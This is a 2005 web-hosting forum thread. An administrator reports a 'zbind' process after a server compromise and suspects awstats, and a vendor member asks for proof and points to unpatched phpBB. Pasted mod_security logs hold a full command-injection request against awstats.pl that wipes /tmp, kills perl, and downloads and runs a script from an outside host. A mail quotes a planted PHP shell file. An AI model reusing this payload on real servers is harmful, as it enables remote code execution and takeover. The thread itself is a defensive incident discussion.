awstats zbind exploit / urgent!!! critical

IPSecureNetwork

Well-Known Member
May 28, 2005
97
0
156
i have a sorprised when today im look the process in the server , i found a proccess called zbind and i m investigated and i found
the zbind exploit . this exploits was affect the awstats .. please update the program or tellme what can i do to update my awstats and fix this .. thanx is URGENT
 

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,437
31
473
Go on, have a guess
Can you be a little clearer on this. That exploit is very common and can be installed by a whole variety of means (usually a phpBB or phpNuke installation). What was the file ownership of the exploit file(s)? If it was nobody:nobody and you are running with SUEXEC enabled, then it's not likely to have been an awstats.pl compromise as perl scripts will be running under the username and group of the account. It's more likely that you haven't upgraded all your phpBB installations to v2.0.16.
 

IPSecureNetwork

Well-Known Member
May 28, 2005
97
0
156
more about the problem whit awstats

the mod security can stop some of the attakers but one of the codes
could be pass the mod security control.

look.

211.51.139.133 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.pulameasuxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl%20sess_3539283e27d73cae29fe2b80f9293f59;echo%20;echo| HTTP/1.1 200.123.181.115 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.51.139.133 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.pulameasuxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl%20sess_3539283e27d73cae29fe2b80f9293f59;echo%20;echo| HTTP/1.1 200.123.181.114 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
Access denied with code 406. Pattern match "/~nobody" at THE_REQUEST

thats some of the codes used by the attakers.
but i i dont know if the awstats have a new bug .. i think that is the problem .. a new bug in the code execution in awstats.pl.

i post here the mail sended by te server to me . :

Note: If this is the first time you recieved this mail, it contains the history for the entire month so far.

Below are the recently upload scripts that contain code to send email. You may wish to inspect them to ensure they are not sending out SPAM.

/home/demo/public_html/lndex.php:128: ";
/home/demo/public_html/lndex.php:129: mail($adminEmail,"PHP Shell Warning - Unauthorized Access",$warnMsg,
/home/demo/public_html/lndex.php:130: "From: $fromEmail\nX-Mailer:$THEVersion AutoWarn System"

after this i delete de account demo . and i found the zbind process and i killed.
 

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,437
31
473
Go on, have a guess
But those were unsuccessful attempts at running awstats.pl and provide no proof at all that it could have been through awstats.pl that they gained access - did you see my comments about the file ownerships? You need to post the entries that actually show the successful compromise before you can start blaming awstats.pl